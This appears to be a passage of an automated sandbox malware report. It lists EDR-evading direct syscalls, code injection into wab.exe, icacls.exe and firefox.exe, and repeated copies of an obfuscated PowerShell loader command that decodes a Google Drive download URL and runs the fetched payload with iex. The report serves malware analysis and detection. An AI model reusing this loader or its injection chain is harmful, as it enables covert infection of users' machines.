Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015C5ED mov eax, dword ptr fs:[00000030h] 11_2_2015C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015C5ED mov eax, dword ptr fs:[00000030h] 11_2_2015C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20123616 mov eax, dword ptr fs:[00000030h] 11_2_20123616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20123616 mov eax, dword ptr fs:[00000030h] 11_2_20123616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162619 mov eax, dword ptr fs:[00000030h] 11_2_20162619
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2019E609 mov eax, dword ptr fs:[00000030h] 11_2_2019E609
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20151607 mov eax, dword ptr fs:[00000030h] 11_2_20151607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015F603 mov eax, dword ptr fs:[00000030h] 11_2_2015F603
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: NULL target: C:\Windows\SysWOW64\icacls.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\icacls.exe Thread register set: target process: 4416 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\icacls.exe Thread APC queued: target process: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E40000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2E3FD78 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udjvne.Mai && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe" Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei tligngabardabandtja,nig horot.ndele charrdi.gnsmydri)p.dic ');$charger=$stuffiness[0];enrens (nepotistic 'tornf$ palpg,paltlpreatosp.llbcarp.a ,rtllsamvi:f,rvafthundrkap tacemetndi,dlkstokklvarebiintran int,=redsen viceeboligwdiarb-,latwobamsebombytjnonsyeforlncval.otstrea overrsarnauy kulksimmuttjordrefr nkmberen.uninwnstoreeka kettnger.ep,grwover,eoplgnbregenc lr,ilnu,rei trosetrompnbargettoles ');enrens (nepotistic ' ovip$f.rmaftrekorpett akor enunstokendo,landefi ,aranstren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$spleniform225 = 1;$figurskaaret='substrin';$figurskaaret+='g';function nepotistic($mistnkeligt){$conchuela=$mistnkeligt.length-$spleniform225;for($autometamorphosis=5; $autometamorphosis -lt $conchuela; $autometamorphosis+=(6)){$aversioners+=$mistnkeligt.$figurskaaret.invoke($autometamorphosis, $spleniform225);}$aversioners;}function enrens($klippehules135){&($grazable) ($klippehules135);}$wedelns=nepotistic 'juleem spiro nnnezluthei in eldecenltjuruakiloj/,itri5euc l. tuff0chemi ,rond(preciwtri,hiroscon treedaggraoelectwhabudsviv,e aborinaartutchae. bekos1babit0kmpen.inarm0 mono;dokum innhowbegrdiskrydn,riva6 bege4sundh; diag benegxovers6.umss4sedim;al id umbromforvoutwe:stunt1towns2riddi1 ,osi.spise0dalc ) i,du unintge.ituedaakac koffk knigocircu/,lnsn2.ount0paahi1infur0 effe0catal1udmat0d,wry1for o telefb,udbiudst,r formepart fkuponoduplixredni/part.1p.stn2 slau1 lase.nonec0milie ';$bombiccite240=nepotistic ' pdaturekursvarieetriumrsmitt- finfalog.egmisape p,ctndomest stor ';$charger=nepotistic ' uffohtest t stent granplnmodska.to:rekto/marli/omnitd uvilr depridelsivanhugeves,i.beirugcoll o madro klokgberiglteleuepun.i. brysc h.tpo lempmskeed/ famiu,alsscsh pp?tungtembelpxnicetptufteoperivr e entcleme=ana.sdtr,ldo snknw drean noncld stooprovialucradgo,sf&u.wraidistodhindu=verse1lakmuy ber,semilsxm.rios .nylwprogrc ugelksi.de_ bares p tihgobblf jac,s v,riidi stvbagersi.nijvduffbxvelv.1slageusit,sk urolpprintrtetrau tyfu2videorsc,ot4velarf sa,kjtvrsk7 afnakinscr8demonzbenin ';$indtgters=nepotistic 'aummb>overe ';$grazable=nepotistic 'nematire ule yv rxhas.e ';$skatteprocenters = nepotistic 'synsfesmertcmytolh maniopostb syste% undea skr prlighpprocedg.umpa kbentsim labioni%socia\menueu r tmd norijwheezvokto,nturbuemonot. bahrmsubstasymboi fo k .ill&pl,dg&basar obdurekur,uctailbhhymenoczari ansig$stil, ';enrens (nepotistic 'josua$um,akggenialprevoocent.bdir.satrdokl gang: imalualternkaithcdalevawaltzvaa ele,gterranklanreheaodispeumontas y arlbuffeyglot.=aften( outgc indemdagpld co.p ,isav/eoniacplagi .rek$stemmsberedkljendaskrmmt.ormitvapo.ecentipopsmnr eninosubmicunsules aglnschultdesceenedblranthrsf,uep) lept ');enrens (nepotistic 'selvs$taarngprerelun.wioteatebgall,as atkl,dslu:forbes m notd staufor efstinkf intritentlnunsenefaglrsfikses grim=zaddi$ tempc b,reh balaathimbrlednig perqeacridr nexp.serassfi.kapinvarlproblibe,ent,aris(venog$bactei 